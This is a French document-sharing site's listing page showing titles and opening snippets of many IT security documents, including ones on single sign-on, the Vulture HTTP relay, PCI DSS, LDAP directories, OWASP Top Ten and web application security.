Présentation de la solution Open Source «Vulture» Version 2.0 Présentation de la solution Open Source «Vulture» Version 2.0 Advens IST Day 15 septembre 2011 http://www.vultureproject.org 1 s/apache/mod_perl/ LE PROJET VULTURE Advens IST Day 15 septembre 2011 http://www.vultureproject.org

Plus en détail

La sécurité dans les grilles

La sécurité dans les grilles La sécurité dans les grilles Yves Denneulin Laboratoire ID/IMAG Plan Introduction les dangers dont il faut se protéger Les propriétés à assurer Les bases de la sécurité Protocoles cryptographiques Utilisation

Plus en détail

La sécurité des PABX Le point de vue d un constructeur Les mesures de sécurisation des équipements lors du développement et de l intégration

La sécurité des PABX Le point de vue d un constructeur Les mesures de sécurisation des équipements lors du développement et de l intégration La sécurité des PABX Le point de vue d un constructeur Les mesures de sécurisation des équipements lors du développement et de l intégration Pierre-Alexandre FUHRMANN Vice-President Global R&D 25 Avril

Plus en détail

De l authentification au hub d identité. si simplement. Présentation OSSIR du 14fev2012

De l authentification au hub d identité. si simplement. Présentation OSSIR du 14fev2012 De l authentification au hub d identité si simplement Présentation OSSIR du 14fev2012 Olivier Perroquin In-Webo Technologies Mission et solutions d In-Webo > Apporter aux Entreprises et Opérateurs de Services

Plus en détail

DAVION Didier 33 avenue Paul Cézanne 59116 HOUPLINES. Auditeur n NPC007570 URBANISATION ET ARCHITECTURE DES SYSTEMES D INFORMATION DOSSIER SSO

DAVION Didier 33 avenue Paul Cézanne 59116 HOUPLINES. Auditeur n NPC007570 URBANISATION ET ARCHITECTURE DES SYSTEMES D INFORMATION DOSSIER SSO DAVION Didier 33 avenue Paul Cézanne 59116 HOUPLINES Auditeur n NPC007570 URBANISATION ET ARCHITECTURE DES SYSTEMES D INFORMATION DOSSIER SSO I. Définition d un SSO Tout à d abord SSO veut dire Single

Plus en détail

www.netexplorer.fr contact@netexplorer.fr

www.netexplorer.fr contact@netexplorer.fr www.netexplorer.fr 05 61 61 20 10 contact@netexplorer.fr Sommaire Sécurité applicative... 3 Authentification... 3 Chiffrement... 4 Traçabilité... 4 Audits... 5 Sécurité infrastructure... 6 Datacenters...

Plus en détail

Gestion et contrôle des accès informatiques

Gestion et contrôle des accès informatiques Gestion et contrôle des accès informatiques Un livre blanc de Bull Evidian Mot de passe unique et gestion centralisée des accès pour les établissements publics et les collectivités territoriales Par Cathy

Plus en détail

SÉCURITÉ DES BASES DE DONNÉES SOUS ORACLE

SÉCURITÉ DES BASES DE DONNÉES SOUS ORACLE SÉCURITÉ DES BASES DE DONNÉES SOUS ORACLE SÉCURITÉ DES DONNÉES La sécurité de l information est vitale. Elle conditionne l activité économique des entreprises et la confiance dans les organismes publics

Plus en détail

Projet Sécurité des SI

Projet Sécurité des SI Projet Sécurité des SI «Groupe Défense» Auteurs Candide SA Diffusion: limitée Type de document Compte rendu Projet Sécurité Destinataires P. LATU Date 14/12/09 M2 STRI Version 1.2 Introduction Sous-traitance

Plus en détail

Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web»

Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web» Projet Formation E-Learning - Sept 2015 «Sécurité des applications Web» 1 OBJECTIFS DE LA FORMATION RSSI PUBLIC Administrateur Réseau et Système Consultant sécurité Responsable Développement Développeur

Plus en détail

Didier Perrot Olivier Perroquin In-Webo Technologies

Didier Perrot Olivier Perroquin In-Webo Technologies Comment accéder concrètement, simplement et sans investissement aux bénéfices de l'authentification forte pour vos applications SI ou métier, Cloud, mobile ou web Didier Perrot Olivier Perroquin In-Webo

Plus en détail

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse

Plus en détail

Sécurisation des architectures traditionnelles et des SOA

Sécurisation des architectures traditionnelles et des SOA Sécurisation des architectures traditionnelles et des SOA Un livre blanc de Bull Evidian Gestion SAML des accès SSO aux applications classiques et J2EE. Max Vallot Sommaire Émergence des architectures

Plus en détail

PASS v2.0 : solution d authentification unique basée sur les composants Shibboleth Service Provider v2.5.1 et Identity Provider v2.3.

PASS v2.0 : solution d authentification unique basée sur les composants Shibboleth Service Provider v2.5.1 et Identity Provider v2.3. PREM IE R M IN IS T R E Secrétariat général de la défense et de la sécurité nationale Agence nationale de la sécurité des systèmes d information PASS v2.0 : solution d authentification unique basée sur

Plus en détail

Contrôle d accès Centralisé Multi-sites

Contrôle d accès Centralisé Multi-sites Informations techniques Contrôle d accès Centralisé Multi-sites Investissement et exploitation optimisés La solution de contrôle d accès centralisée de Netinary s adresse à toute structure souhaitant proposer

Plus en détail

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET http://www.chambet.com

Urbanisation des SI Conduite du changement IT 20/03/09. Patrick CHAMBET http://www.chambet.com Urbanisation des SI Conduite du changement IT 20/03/09 Sécuriser ses Web Services Patrick CHAMBET http://www.chambet.com Bouygues Telecom Direction Gouvernance, Outils et Architecture / Sécurité du SI

Plus en détail

Sécurisation en local

Sécurisation en local Attaques locales (internes) Sécurisation en local Indépendamment de la présence d un réseau Espionnage quand même possible Émission électromagnétiques Norme tempest Dispositifs sans fil Clavier/souris

Plus en détail

La GRC en temps de crise, difficile équilibre entre sentiment de sécurité et réduction des coûts

<Insert Picture Here> La GRC en temps de crise, difficile équilibre entre sentiment de sécurité et réduction des coûts La GRC en temps de crise, difficile équilibre entre sentiment de sécurité et réduction des coûts Christophe Bonenfant Cyril Gollain La GRC en période de croissance Gouvernance Gestion

Plus en détail

Sensibilisation à la sécurité informatique

Sensibilisation à la sécurité informatique Sensibilisation à la sécurité informatique Michel Salomon IUT de Belfort-Montbéliard Département d informatique Michel Salomon Sécurité 1 / 25 Sensibilisation à la sécurité informatique Généralités et

Plus en détail

Single Sign On. Nicolas Dewaele. Single Sign On. Page 1. et Web SSO

Single Sign On. Nicolas Dewaele. Single Sign On. Page 1. et Web SSO Page 1 Introduction Sommaire I- Présentation de la technologie II- Architectures classiques et étude du marché III- Implémentation en entreprise IV- Présentation de systèmes SSO Annexes Page 2 Introduction

Plus en détail

LDAP & Unified User Management Suite

LDAP & Unified User Management Suite LDAP & Unified User Management Suite LDAP - la nouvelle technologie d annuaire sécurisé La Net Economy Quelles conséquences? Croissance explosive du nombre d applications basées sur Internet non administrables

Plus en détail

Les risques HERVE SCHAUER HSC

Les risques HERVE SCHAUER HSC HERVE SCHAUER HSC Les risques Les risques ne cessent d'augmenter: Informatisation systématique de l'ensemble de la société Ouverture des systèmes d'information sur Internet Démultiplication de ce qui est

Plus en détail

Conformité PCI DSS. Réduire les risques en gérant les identités et les accès. white paper

Conformité PCI DSS. Réduire les risques en gérant les identités et les accès. white paper Conformité PCI DSS Réduire les risques en gérant les identités et les accès Ce livre blanc explique comment la suite IAM d Evidian peut vous aider à vous conformer aux exigences PCI DSS. white paper 39

Plus en détail

Vulnérabilités et solutions de sécurisation des applications Web

Vulnérabilités et solutions de sécurisation des applications Web Vulnérabilités et solutions de sécurisation des applications Web Patrick CHAMBET EdelWeb ON-X Consulting patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Eric Larcher RSSI Accor

Plus en détail

Tutorial Authentification Forte Technologie des identités numériques

Tutorial Authentification Forte Technologie des identités numériques e-xpert Solutions SA 3, Chemin du Creux CH 1233 Bernex-Genève Tél +1 22 727 05 55 Fax +1 22 727 05 50 Tutorial Authentification Forte Technologie des identités numériques Volume 2/3 Par Sylvain Maret /

Plus en détail

Single Sign On (l apport déterminant du SSO dans un projet d IAM ) Yves RAISIN - biomérieux

Single Sign On (l apport déterminant du SSO dans un projet d IAM ) Yves RAISIN - biomérieux Single Sign On (l apport déterminant du SSO dans un projet d IAM ) Yves RAISIN - biomérieux Sommaire Concepts du SSO Intégration du SSO dans un projet d IAM Spécifications fonctionnelles et techniques

Plus en détail

ModSecurity. Cible de sécurité CSPN Version 0.96

ModSecurity. Cible de sécurité CSPN Version 0.96 Cible de sécurité CSPN Version 0.96 TABLE DES MATIERES 1 IDENTIFICATION... 3 1.1 IDENTIFICATION DE LA CIBLE DE SECURITE... 3 1.2 IDENTIFICATION DU PRODUIT... 3 2 ARGUMENTAIRE (DESCRIPTION) DU PRODUIT...

Plus en détail

ENVOLE 1.5. Calendrier Envole

ENVOLE 1.5. Calendrier Envole ENVOLE 1.5 Calendrier Envole RSA FIM 1 avril 2008 V 1.13 sur EOLE V 2.0 1 septembre 2008 EOLE V 2.1 10 octobre 2008 V 1.15 RC sur EOLE V 2.0 Modification du SSO EOLE 2.2 (PAM-CAS, CT EOLE V 2.2 RC Prise

Plus en détail

HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet.

HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet. HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Journées CFSSI Sécurité et SGBD Nicolas Jombart

Plus en détail

Sécurité dans les développements

Sécurité dans les développements HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Sécurité dans les développements Paris, 11 mai 2007 Hervé Schauer

Plus en détail

Ce guide n a pas vocation à se substituer à une démarche de certification PCI DSS.

Ce guide n a pas vocation à se substituer à une démarche de certification PCI DSS. Guide à l attention des développeurs / hébergeurs de sites web marchands sur le niveau minimum de sécurité pour le traitement de numéros de cartes bancaires Préambule Ce guide n a pas vocation à se substituer

Plus en détail

Fiches micro-informatique SECURITE LOGIQUE LOGIxx

Fiches micro-informatique SECURITE LOGIQUE LOGIxx Objectif Fiches micro-informatique SECURITE LOGIQUE LOGIxx Présenter des préconisations pour sécuriser le poste de travail informatique et son environnement sous forme de fiches pratiques. Public concerné

Plus en détail

Sécurité des systèmes informatiques

Sécurité des systèmes informatiques Sécurité des systèmes informatiques Alex Auvolat, Nissim Zerbib 4 avril 2014 Alex Auvolat, Nissim Zerbib Sécurité des systèmes informatiques 1 / 43 Introduction La sécurité est une chaîne : elle est aussi

Plus en détail

Catalogue «Intégration de solutions»

Catalogue «Intégration de solutions» Catalogue «Intégration de solutions» 1 Nos prestations Offre 01 Offre 02 Offre 03 Offre 04 Offre 05 Offre 06 Offre 07 Offre 08 Offre 09 Offre 10 Offre 11 Offre 12 Offre 13 Offre 14 Offre 15 Offre 16 Antivirus

Plus en détail

Gestion des accès et des identités

Gestion des accès et des identités Gestion des accès et des identités Laurent Patrigot Forum Navixia / 30 Septembre 2010 Agenda Présentation de l UER Problématique et Objectifs La solution Evidian IAM Questions L UER (Union Européenne de

Plus en détail

Linux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch

Linux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch Bernard Boutherin Benoit Delaunay Cahiers de l Admin Linux Sécuriser un réseau 3 e édition Collection dirigée par Nat Makarévitch Groupe Eyrolles, 2003, 2004, 2007, ISBN : 2-212-11960-7, ISBN 13 : 978-2-212-11960-2

Plus en détail

Augmenter l efficacité et la sécurité avec la gestion des identités et le SSO

Augmenter l efficacité et la sécurité avec la gestion des identités et le SSO Augmenter l efficacité et la sécurité avec la gestion des identités et le SSO Alexandre Garret Directeur des opérations - Atheos Charles Tostain Consultant Sécurité - IBM 24 Juin 2009 2009 IBM Corporation

Plus en détail

Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE

Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE Référence : BNX_Cible-de-sécurité_CSPN Version : 1.3 Etat : A valider Date : Affaire/projet : Client : BEE WARE Classification : Diffusion projet Bee Ware i-suite Cible de Sécurité CSPN Validation Fonctionnelle

Plus en détail

Réseau - Sécurité - Métrologie - Data Center. Le leader du marché allemand des UTM débarque en France avec des arguments forts!

Réseau - Sécurité - Métrologie - Data Center. Le leader du marché allemand des UTM débarque en France avec des arguments forts! Réseau - Sécurité - Métrologie - Data Center Energy News Le coin des technos : Sophos UTM 1er trimestre 2013 Le leader du marché allemand des UTM débarque en France avec des arguments forts! Vous trouverez

Plus en détail

et Groupe Eyrolles, 2006, ISBN : 2-212-11747-7

et Groupe Eyrolles, 2006, ISBN : 2-212-11747-7 Tsoft et Groupe Eyrolles, 2006, ISBN : 2-212-11747-7 OEM Console Java OEM Console HTTP OEM Database Control Oracle Net Manager 6 Module 6 : Oracle Enterprise Manager Objectifs Contenu A la fin de ce module,

Plus en détail

Evidian IAM Suite 8.0 Identity Management

Evidian IAM Suite 8.0 Identity Management Evidian IAM Suite 8.0 Identity Management Un livre blanc Evidian Summary Evidian ID synchronization. Evidian User Provisioning. 2013 Evidian Les informations contenues dans ce document reflètent l'opinion

Plus en détail

Fiche Produit ClickNDial

Fiche Produit ClickNDial Fiche Produit ClickNDial Utilitaire de numérotation et client annuaire pour Cisco CallManager applications for Cisco Unified Communications Directory Solutions IPS Global Directory Web Directory IPS Popup

Plus en détail

Bonnes pratiques de la gestion des identités et des accès au système d information (IAM)

Bonnes pratiques de la gestion des identités et des accès au système d information (IAM) Bonnes pratiques de la gestion des identités et des accès au système d information (IAM) Lionel GAULIARDON Solutions techniques et Organisations SOMMAIRE IAM Qu est-ce que c est et à quoi cela sert Cas

Plus en détail

SPF Finances Programme PSMC

SPF Finances Programme PSMC SPF Finances Programme PSMC Security & Control V3.0 Présenté pour validation aux experts ICT, à l équipe de projet et au Comité de Pilotage du 16/06/2004 Pré-étude Programme PSMC Table des matières Page.

Plus en détail

Managed Services Comment décliner la gamme en mode Cloud. Fabienne Druis Offering leader

Managed Services Comment décliner la gamme en mode Cloud. Fabienne Druis Offering leader Managed Services Comment décliner la gamme en mode Cloud Fabienne Druis Offering leader Les services d infogérance autour du Data Center DE APPLICATIONS DES SYSTEMES D INFRASTRUCTURE Intégration en pré

Plus en détail

Smart Notification Management

Smart Notification Management Smart Notification Management Janvier 2013 Gérer les alertes, ne pas uniquement les livrer Chaque organisation IT vise à bien servir ses utilisateurs en assurant que les services et solutions disponibles

Plus en détail

Gestion des fichiers journaux

Gestion des fichiers journaux Gestion des fichiers journaux Jean-Marc Robert Génie logiciel et des TI Surveillance et audit Afin de s assurer de l efficacité des moyens de protection et de contrôle, il faut mettre en place des moyens

Plus en détail

Livre blanc sur l authentification forte

Livre blanc sur l authentification forte s 2010 Livre blanc sur l authentification forte Fonctionnement de l authentification «One Time Password» et son implémentation avec les solutions actuelles du marché Dans le contexte actuel où le vol d

Plus en détail

OWASP Top Ten 2007 Sommaire exécutif

OWASP Top Ten 2007 Sommaire exécutif OWASP Top Ten 2007 Sommaire exécutif Benoit Guerette, gueb@owasp.org Montreal Chapter Leader 24 février 2009 OWASP Education Project Copyright 2007 The OWASP Foundation Permission is granted to copy, distribute

Plus en détail

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de la PCI (PCI DSS) Version : 1.2 Date : Octobre 2008

Plus en détail

La gamme express UCOPIA. www.ucopia.com

La gamme express UCOPIA. www.ucopia.com La gamme express UCOPIA www.ucopia.com UCOPIA s adresse principalement aux petites organisations (Hôtels, PME, Cliniques, Etablissements secondaires...). Produit ayant obtenu en 2010 la Certification de

Plus en détail

Vue d'ensemble des groupes dans Active Directory 2003

Vue d'ensemble des groupes dans Active Directory 2003 Vue d'ensemble des groupes dans Active Directory 2003 Charles BARJANSKY Laboratoire Supinfo des Technologies Microsoft Introduction Les administrateurs réseaux, lors de la mise en place d'une nouvelle

Plus en détail

Présentation SafeNet Authentication Service (SAS) Octobre 2013

Présentation SafeNet Authentication Service (SAS) Octobre 2013 Bâtir un environnement d'authentification très fiable Présentation SafeNet Authentication Service (SAS) Octobre 2013 Insérez votre nom Insérez votre titre Insérez la date 1 Présentation de l offre SAS

Plus en détail

Gestion des Identités : 5 règles d'or. Patrice Kiotsekian Directeur Evidian France

Gestion des Identités : 5 règles d'or. Patrice Kiotsekian Directeur Evidian France Gestion des Identités : 5 règles d'or Patrice Kiotsekian Directeur Evidian France Page 1 - Mai 2005 Défi N 1 : la gestion de la cohérence Alors que les référentiels et bases d identité et de sécurité sont

Plus en détail

Groupe Eyrolles, 2004 ISBN : 2-212-11504-0

Groupe Eyrolles, 2004 ISBN : 2-212-11504-0 Groupe Eyrolles, 2004 ISBN : 2-212-11504-0 Avant-propos L économie en réseau, ou la netéconomie, est au cœur des débats et des stratégies de toutes les entreprises. Les organisations, qu il s agisse de

Plus en détail

La sécurité pour les développeurs. Christophe Villeneuve @hellosct1

La sécurité pour les développeurs. Christophe Villeneuve @hellosct1 La sécurité pour les développeurs Christophe Villeneuve @hellosct1 Qui... est Christophe Villeneuve? afup lemug.fr mysql mariadb drupal demoscene firefoxos drupagora phptour forumphp solutionlinux demoinparis

Plus en détail

TUNIS LE : 20, 21, 22 JUIN 2006

TUNIS LE : 20, 21, 22 JUIN 2006 SÉMINAIRE SUR LA SSI : LA SÉCURITÉ DES SYSTÈMES D INFORMATION TUNIS LE : 20, 21, 22 JUIN 2006 La Sécurité Informatique : LES TECHNOLOGIES ET LES PRODUITS ORGANISÉ PAR : PARTENARIAT AVEC : ARAB ENGINEERING

Plus en détail

Vers un nouveau modèle de sécurité

Vers un nouveau modèle de sécurité 1er décembre 2009 GS Days Vers un nouveau modèle de sécurité Gérôme BILLOIS - Manager sécurité gerome.billois@solucom.fr Qui sommes-nous? Solucom est un cabinet indépendant de conseil en management et

Plus en détail

Lieberman Software Corporation

Lieberman Software Corporation Lieberman Software Corporation Managing Privileged Accounts Ou La Gestion des Comptes à Privilèges 2012 by Lieberman Software Corporation Agenda L éditeur Lieberman Software Les défis Failles sécurité,

Plus en détail

INTRODUCTION A LA SECURITE DES RESEAUX

INTRODUCTION A LA SECURITE DES RESEAUX INTRODUCTION A LA SECURITE DES RESEAUX OBJECTIFS de la SECURITE des DONNEES (relativement à des personnes non autorisées) Confidentielles-ne doivent pas être lues Permanentes-ne doivent pas être altérées

Plus en détail

Présentation de la société. Aout 2011

Présentation de la société. Aout 2011 Présentation de la société Aout 2011 En quelques mots SonicWALL Inc, (Nasdaq SNWL), est un leader mondial de solutions intelligentes de sécurité des réseaux et de protection de données. Fournisseur de

Plus en détail

La sécurité informatique dans la petite entreprise Etat de l'art et Bonnes Pratiques (2ième édition)

La sécurité informatique dans la petite entreprise Etat de l'art et Bonnes Pratiques (2ième édition) Généralités sur la sécurité informatique 1. Introduction 13 2. Les domaines et normes associés 16 2.1 Les bonnes pratiques ITIL V3 16 2.1.1 Stratégie des services - Service Strategy 17 2.1.2 Conception

Plus en détail

Présentation du relais HTTP Open Source Vulture. Arnaud Desmons Jérémie Jourdin

Présentation du relais HTTP Open Source Vulture. Arnaud Desmons <ads@intrinsec.com> Jérémie Jourdin <jjn@intrinsec.com> Arnaud Desmons Jérémie Jourdin Présentation Motivations Historique Démonstration Présentation fonctionnelle Présentation technique L'interface d'administration Roadmap

Plus en détail

Gestion des comptes à privilèges

Gestion des comptes à privilèges 12 décembre 2013 Gestion des comptes à privilèges Bertrand CARLIER, Manager Sécurité de l Information bertrand.carlier@solucom.fr Solucom, conseil en management et système d information Cabinet de conseil

Plus en détail

Firewall IDS Architecture. Assurer le contrôle des connexions au. nicolas.hernandez@univ-nantes.fr Sécurité 1

Firewall IDS Architecture. Assurer le contrôle des connexions au. nicolas.hernandez@univ-nantes.fr Sécurité 1 Sécurité Firewall IDS Architecture sécurisée d un réseau Assurer le contrôle des connexions au réseau nicolas.hernandez@univ-nantes.fr Sécurité 1 Sommaire général Mise en oeuvre d une politique de sécurité

Plus en détail

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 A t t a q u e s c o n t r e l e s a p p l i s w e b cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 D e l ' u t i l i t é d e l ' a t t a

Plus en détail

EJBCA Le futur de la PKI

EJBCA Le futur de la PKI EJBCA Le futur de la PKI EJBCA EJBCA c'est quoi? EJBCA est une PKI (Public Key infrastructure) ou IGC (Infrastructure de gestion de clés) sous licence OpenSource (LGPL) développée en Java/J2EE. EJBCA bien

Plus en détail

Solutions Microsoft Identity and Access

Solutions Microsoft Identity and Access Solutions Microsoft Identity and Access 2 Solutions Microsoft Identity and Access Microsoft Identity and Access (IDA) permet aux entreprises d améliorer leur efficacité et leurs connexions internes et

Plus en détail

SÉCURITÉ RÉSEAUX/INTERNET, SYNTHÈSE

SÉCURITÉ RÉSEAUX/INTERNET, SYNTHÈSE Réseaux et Sécurité SÉCURITÉ RÉSEAUX/INTERNET, SYNTHÈSE Réf : SRI Durée : 3 jours (7 heures) OBJECTIFS DE LA FORMATION Ce séminaire vous montrera comment répondre aux impératifs de sécurité des communications

Plus en détail

Sécurité des applications web. Daniel Boteanu

Sécurité des applications web. Daniel Boteanu I F8420: Éléments de Sécurité des applications web Daniel Boteanu Architecture des applications web Client légitime Internet HTTP 浀 HTML Server Web 2 Architecture des applications web Client légitime Internet

Plus en détail

Formations. «Produits & Applications»

Formations. «Produits & Applications» Formations «Produits & Applications» Nos formations Réf. PAP01 14 Heures ANTIVIRUS - McAfee : Endpoint Réf. PAP02 7 Heures ANTIVIRUS - ESET NOD32 Réf. PAP03 28 Heures FIREWALL - Check Point Réf. PAP04

Plus en détail

A. À propos des annuaires

A. À propos des annuaires Chapitre 2 A. À propos des annuaires Nous sommes familiers et habitués à utiliser différents types d'annuaires dans notre vie quotidienne. À titre d'exemple, nous pouvons citer les annuaires téléphoniques

Plus en détail

Authentification et Autorisation

Authentification et Autorisation Authentification et Autorisation Jean-Marc Robert Génie logiciel et des TI Plan de la présentation Introduction Contrôle accès Identification Authentifiction Autorisation Imputabilité (Accoutability) Conclusion

Plus en détail

PostFiles. La solution de partage et de synchronisation de fichiers dédiée aux professionnels. www.oodrive.com

PostFiles. La solution de partage et de synchronisation de fichiers dédiée aux professionnels. www.oodrive.com La solution de partage et de synchronisation de fichiers dédiée aux professionnels www.oodrive.com Partager tout type de fichiers sans contrainte de taille et de format. Synchroniser et consulter ses fichiers

Plus en détail

Annuaires LDAP et méta-annuaires

Annuaires LDAP et méta-annuaires Annuaires LDAP et méta-annuaires Laurent Mynard Yphise 6 rue Beaubourg - 75004 PARIS yphise@yphise.com - http://yphise.fr T 01 44 59 93 00 F 01 44 59 93 09 LDAP020314-1 Agenda A propos d Yphise Les annuaires

Plus en détail

Architecture et infrastructure Web

Architecture et infrastructure Web Architecture et infrastructure Web par Patrice Caron http://www.patricecaron.com pcaron@patricecaron.com Ordre du jour Entreprises / Gouvernements Introduction: Architecture orientée services? Quelques

Plus en détail

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif?

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif? Revue de code Sécuritéou Test d Intrusion Applicatif Quel est le plus efficace pour évaluer un niveau de sécurité applicatif? http://www.google.fr/#q=sebastien gioria Responsable de la branche Audit S.I

Plus en détail

Gestion des utilisateurs et Entreprise Etendue

Gestion des utilisateurs et Entreprise Etendue Gestion des utilisateurs et Entreprise Etendue Laurent Ruyssen 6 rue Beaubourg - 75004 PARIS T 1 44 59 93 00 F 1 44 59 93 09 yphise@yphise.com - http://yphise.fr GUEE0009-1 Agenda Entreprise Etendue Mission

Plus en détail

Utiliser Améliorer Prêcher. Introduction à LDAP

Utiliser Améliorer Prêcher. Introduction à LDAP Introduction à LDAP Introduction à LDAP Sommaire 2 Sommaire Historique rapide Les concepts LDAP et la gestion d identité Démonstration Autre ressources 2 Historique Historique Historique rapide 4 Historique

Plus en détail

Sécurité des Postes Clients

Sécurité des Postes Clients HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Sécurité des Postes Clients Table ronde CFSSI Jeudi 29 mars 2007 Benjamin

Plus en détail

Présentation du référentiel PCI-DSS

Présentation du référentiel PCI-DSS Présentation du référentiel PCI-DSS Hervé Hosy herve.hosy@oppida.fr 06.03.51.96.66 Page 1 Agenda Référentiel PCI-DSS Contexte Structure du référentiel Lien avec les normes ISO 270xx 2 Contexte Page 3 Contexte

Plus en détail

Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal

Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal SSO open source avec CAS Introduction Pourquoi le Single Sign-On? Principes du SSO sur le

Plus en détail